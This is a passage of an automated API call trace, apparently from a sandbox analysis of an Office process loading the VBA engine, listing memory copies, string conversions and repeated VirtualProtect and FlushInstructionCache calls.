_Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.773] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.773] memcpy (in: _Dst=0xd015170, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015170) returned 0xd015170 [0109.773] memcpy (in: _Dst=0xd015174, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015174) returned 0xd015174 [0109.773] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.773] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.774] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.774] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3f9c, cbMultiByte=8, lpWideCharStr=0x114716e4, cchWideChar=18 | out: lpWideCharStr="qpSuoM7k") returned 8 [0109.774] memcpy (in: _Dst=0xc8b61c0, _Src=0x114716e0, _Size=0x16 | out: _Dst=0xc8b61c0) returned 0xc8b61c0 [0109.774] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.774] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.774] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.775] memcpy (in: _Dst=0xd01516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.775] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2e8a, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0109.775] wcscpy_s (in: _Destination=0xc8b61dc, _SizeInWords=0x7, _Source="Remove" | out: _Destination="Remove") returned 0x0 [0109.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb1a3fbc, cbMultiByte=8, lpWideCharStr=0x11472256, cchWideChar=18 | out: lpWideCharStr="BIAcobr1") returned 8 [0109.775] memcpy (in: _Dst=0xc8b61f0, _Src=0x11472252, _Size=0x16 | out: _Dst=0xc8b61f0) returned 0xc8b61f0 [0109.775] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.776] memcpy (in: _Dst=0xd015168, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.776] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.776] memcpy (in: _Dst=0xd01516c, _Src=0x197894, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.776] memcpy (in: _Dst=0xd01516c, _Src=0x197a28, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2e8a, cbMultiByte=8, lpWideCharStr=0x197658, cchWideChar=7 | out: lpWideCharStr="Remove") returned 0 [0109.776] memcpy (in: _Dst=0xd015168, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.776] memcpy (in: _Dst=0xd01516c, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0109.776] CRetailMalloc_Alloc () returned 0xcb62730 [0109.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0109.779] CRetailMalloc_Alloc () returned 0xcb3ce60 [0109.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0109.781] memcpy (in: _Dst=0xcb5e80c, _Src=0x197ac4, _Size=0x18 | out: _Dst=0xcb5e80c) returned 0xcb5e80c [0109.782] CRetailMalloc_Realloc () returned 0xcb5e5a0 [0109.782] CRetailMalloc_Free () returned 0x1 [0109.782] GetCurrentProcess () returned 0xffffffff [0109.782] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0109.782] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.783] GetCurrentProcess () returned 0xffffffff [0109.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0109.783] GetCurrentProcess () returned 0xffffffff [0109.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0109.783] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.783] GetCurrentProcess () returned 0xffffffff [0109.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0109.783] GetCurrentProcess () returned 0xffffffff [0109.783] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0109.783] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.784] GetCurrentProcess () returned 0xffffffff [0109.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0109.784] GetCurrentProcess () returned 0xffffffff [0109.784] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0109.784] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.785] GetCurrentProcess () returned 0xffffffff [0109.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0109.785] GetCurrentProcess () returned 0xffffffff [0109.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0109.785] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.785] GetCurrentProcess () returned 0xffffffff [0109.785] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0109.786] GetCurrentProcess () returned 0xffffffff [0109.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0109.786] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.786] GetCurrentProcess () returned 0xffffffff [0109.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0109.786] GetCurrentProcess () returned 0xffffffff [0109.786] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0109.786] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.787] GetCurrentProcess () returned 0xffffffff [0109.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0109.787] GetCurrentProcess () returned 0xffffffff [0109.787] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0109.787] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.788] GetCurrentProcess () returned 0xffffffff [0109.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0109.788] GetCurrentProcess () returned 0xffffffff [0109.788] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0109.788] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.788] GetCurrentProcess () returned 0xffffffff [0109.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0109.789] GetCurrentProcess () returned 0xffffffff [0109.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0109.789] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.789] GetCurrentProcess () returned 0xffffffff [0109.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0109.789] GetCurrentProcess () returned 0xffffffff [0109.789] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0109.789] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.790] GetCurrentProcess () returned 0xffffffff [0109.790] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0109.790] GetCurrentProcess () returned 0xffffffff [0109.790] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0109.790] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.791] GetCurrentProcess () returned 0xffffffff [0109.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0109.791] GetCurrentProcess () returned 0xffffffff [0109.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0109.791] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.791] GetCurrentProcess () returned 0xffffffff [0109.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0109.791] GetCurrentProcess () returned 0xffffffff [0109.791] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0109.791] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.792] GetCurrentProcess () returned 0xffffffff [0109.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0109.792] GetCurrentProcess () returned 0xffffffff [0109.792] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0109.792] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.793] GetCurrentProcess () returned 0xffffffff [0109.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0109.793] GetCurrentProcess () returned 0xffffffff [0109.793] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0109.793] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.843] GetCurrentProcess () returned 0xffffffff [0109.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0109.843] GetCurrentProcess () returned 0xffffffff [0109.843] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0109.843] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.844] GetCurrentProcess () returned 0xffffffff [0109.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0109.844] GetCurrentProcess () returned 0xffffffff [0109.844] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0109.844] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.844] GetCurrentProcess () returned 0xffffffff [0109.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0109.845] GetCurrentProcess () returned 0xffffffff [0109.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0109.845] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.845] GetCurrentProcess () returned 0xffffffff [0109.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0109.845] GetCurrentProcess () returned 0xffffffff [0109.845] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0109.845] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.846] GetCurrentProcess () returned 0xffffffff [0109.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0109.846] GetCurrentProcess () returned 0xffffffff [0109.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0109.846] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.846] GetCurrentProcess () returned 0xffffffff [0109.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0109.846] GetCurrentProcess () returned 0xffffffff [0109.846] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0109.846] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.847] GetCurrentProcess () returned 0xffffffff [0109.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0109.847] GetCurrentProcess () returned 0xffffffff [0109.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0109.847] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.847] GetCurrentProcess () returned 0xffffffff [0109.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0109.847] GetCurrentProcess () returned 0xffffffff [0109.847] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0109.847] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.848] GetCurrentProcess () returned 0xffffffff [0109.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0109.848] GetCurrentProcess () returned 0xffffffff [0109.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0109.848] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.848] GetCurrentProcess () returned 0xffffffff [0109.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0109.848] GetCurrentProcess () returned 0xffffffff [0109.848] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0109.848] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.849] GetCurrentProcess () returned 0xffffffff [0109.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0109.849] GetCurrentProcess () returned 0xffffffff [0109.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0109.849] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.849] GetCurrentProcess () returned 0xffffffff [0109.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0109.849] GetCurrentProcess () returned 0xffffffff [0109.849] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0109.849] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.850] GetCurrentProcess () returned 0xffffffff [0109.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0109.850] GetCurrentProcess () returned 0xffffffff [0109.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0109.850] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.850] GetCurrentProcess () returned 0xffffffff [0109.850] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0109.850] GetCurrentProcess () returned 0xffffffff [0109.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0109.851] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.851] GetCurrentProcess () returned 0xffffffff [0109.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0109.851] GetCurrentProcess () returned 0xffffffff [0109.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0109.851] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19776c | out: lpflOldProtect=0x19776c*=0x40) returned 1 [0109.851] GetCurrentProcess () returned 0xffffffff [0109.851] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0109.852] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.880] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0109.880] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0109.880] SetErrorMode (uMode=0x8001) returned 0x8001 [0109.881] GetProcAddress (hModule=0x693e0000, lpProcName=0x284) returned 0x69415c5c [0109.881] GetCurrentProcess () returned 0xffffffff [0109.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d2954, dwSize=0x19) returned 1 [0109.881] VirtualProtect (in: lpAddress=0xf5d2954, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0109.881] GetCurrentProcess () returned 0xffffffff [0109.881] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d29ac, dwSize=0x19) returned 1 [0109.881] VirtualProtect (in: lpAddress=0xf5d29ac, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x40) returned 1 [0109.882] GetCurrentProcess () returned 0xffffffff [0109.882] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf600294, dwSize=0x19) returned 1 [0109.882] VirtualProtect (in: lpAddress=0xf600294, dwSize=0x19, flNewProtect=0x40, lpflOldProtect=0x197788 | out: lpflOldProtect=0x197788*=0x4) returned 1 [0109.883] GetAsyncKeyState (vKey=3) returned 0 [0109.884] CRetailMalloc_Alloc () returned 0xcb5e880 [0109.884] memcpy (in: _Dst=0xd015168, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0109.884] memcpy (in: _Dst=0xcb5e8a0, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb5e8a0) returned 0xcb5e8a0 [0109.884] CRetailMalloc_Realloc () returned 0xcb5e880 [0109.884] CRetailMalloc_Free () returned 0x1 [0109.884] GetCurrentProcess () returned 0xffffffff [0109.884] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0109.885] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.885] GetCurrentProcess () returned 0xffffffff [0109.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0109.885] GetCurrentProcess () returned 0xffffffff [0109.885] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0109.885] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.886] GetCurrentProcess () returned 0xffffffff [0109.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0109.886] GetCurrentProcess () returned 0xffffffff [0109.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0109.886] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.886] GetCurrentProcess () returned 0xffffffff [0109.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0109.886] GetCurrentProcess () returned 0xffffffff [0109.886] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0109.886] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.887] GetCurrentProcess () returned 0xffffffff [0109.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0109.887] GetCurrentProcess () returned 0xffffffff [0109.887] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0109.887] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.888] GetCurrentProcess () returned 0xffffffff [0109.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0109.888] GetCurrentProcess () returned 0xffffffff [0109.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0109.888] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.888] GetCurrentProcess () returned 0xffffffff [0109.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0109.888] GetCurrentProcess () returned 0xffffffff [0109.888] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0109.888] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.889] GetCurrentProcess () returned 0xffffffff [0109.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0109.889] GetCurrentProcess () returned 0xffffffff [0109.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0109.889] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.889] GetCurrentProcess () returned 0xffffffff [0109.889] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0109.890] GetCurrentProcess () returned 0xffffffff [0109.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0109.890] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.890] GetCurrentProcess () returned 0xffffffff [0109.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0109.890] GetCurrentProcess () returned 0xffffffff [0109.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0109.890] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.890] GetCurrentProcess () returned 0xffffffff [0109.890] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0109.891] GetCurrentProcess () returned 0xffffffff [0109.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0109.891] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.891] GetCurrentProcess () returned 0xffffffff [0109.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0109.891] GetCurrentProcess () returned 0xffffffff [0109.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0109.891] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.891] GetCurrentProcess () returned 0xffffffff [0109.891] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0109.892] GetCurrentProcess () returned 0xffffffff [0109.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0109.892] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0109.892] GetCurrentProcess () returned 0xffffffff [0109.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0109.892] GetCurrentProcess () returned 0xffffffff [0109.892] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0109.892] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, 